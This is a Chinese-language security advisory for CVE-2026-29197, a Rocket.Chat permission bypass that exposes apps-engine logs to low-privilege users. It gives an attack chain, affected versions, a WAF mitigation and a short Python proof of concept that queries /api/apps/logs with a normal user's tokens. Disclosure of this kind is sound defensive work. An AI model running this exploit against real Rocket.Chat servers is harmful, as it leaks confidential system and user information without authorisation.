IPBUF安全漏洞报告
English
CVE-2026-29197 CVSS 4.3 中危

CVE-2026-29197 Rocket.Chat权限绕过致日志信息泄露

披露日期: 2026-04-24

漏洞信息

漏洞编号
CVE-2026-29197
漏洞类型
权限绕过
CVSS评分
4.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Rocket.Chat

相关标签

权限绕过信息泄露Rocket.ChatCVE-2026-29197Access Control

漏洞概述

Rocket.Chat受影响版本中的日志API端点存在权限检查拼写错误,导致低权限经过身份验证的用户可绕过权限验证。攻击者可利用此漏洞访问并读取本应受限的apps-engine日志,造成敏感信息泄露。

技术细节

该漏洞的核心在于代码层面的访问控制缺陷。在受影响的Rocket.Chat版本中,负责保护 `/api/apps/logs` 和 `/api/apps/:id/logs` 端点的权限检查逻辑中存在拼写错误,导致验证机制失效。正常情况下,访问这些日志需要管理员或特定的高级权限。然而,由于拼写错误,系统未能正确执行权限判断,使得任何拥有有效账号的登录用户(包括低权限用户)均可直接发送HTTP请求获取日志内容。攻击者无需用户交互,利用网络攻击向量即可触发漏洞。日志内容可能包含系统调试信息、内部路径、堆栈跟踪甚至部分用户数据,严重威胁系统机密性。

攻击链分析

STEP 1
侦察
识别目标系统为Rocket.Chat,并确认其版本位于受影响范围内(如7.x, 8.x特定版本)。
STEP 2
获取凭证
注册或获取一个低权限的普通用户账号,并完成登录以获取有效的X-Auth-Token和X-User-Id。
STEP 3
漏洞利用
使用获取的低权限凭证,构造HTTP GET请求发送至 /api/apps/logs 或 /api/apps/:id/logs 端点。
STEP 4
信息泄露
服务器返回apps-engine的日志文件内容,攻击者解析日志以获取敏感系统信息。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL # Replace with actual target host target_url = "https://<target-domain>/api/apps/logs" # Auth token (X-Auth-Token) and User ID (X-User-Id) required # Obtain these after logging in with a low-privilege user headers = { "X-Auth-Token": "<your-auth-token>", "X-User-Id": "<your-user-id>", "Content-Type": "application/json" } try: # Send GET request to the vulnerable endpoint response = requests.get(target_url, headers=headers, verify=False) if response.status_code == 200: print("[+] Exploit Successful! Logs retrieved:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") print(response.text) except Exception as e: print(f"[!] An error occurred: {e}")

影响范围

Rocket.Chat < 8.4.0
Rocket.Chat < 8.3.2
Rocket.Chat < 8.2.2
Rocket.Chat < 8.1.3
Rocket.Chat < 8.0.4
Rocket.Chat < 7.13.6
Rocket.Chat < 7.12.7
Rocket.Chat < 7.11.7
Rocket.Chat < 7.10.10

防御指南

临时缓解措施
若无法立即升级,建议在网络边界(如WAF或反向代理)上配置规则,阻断对 /api/apps/logs 和 /api/apps/:id/logs 路径的非管理员IP访问请求,或临时禁用相关日志接口。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表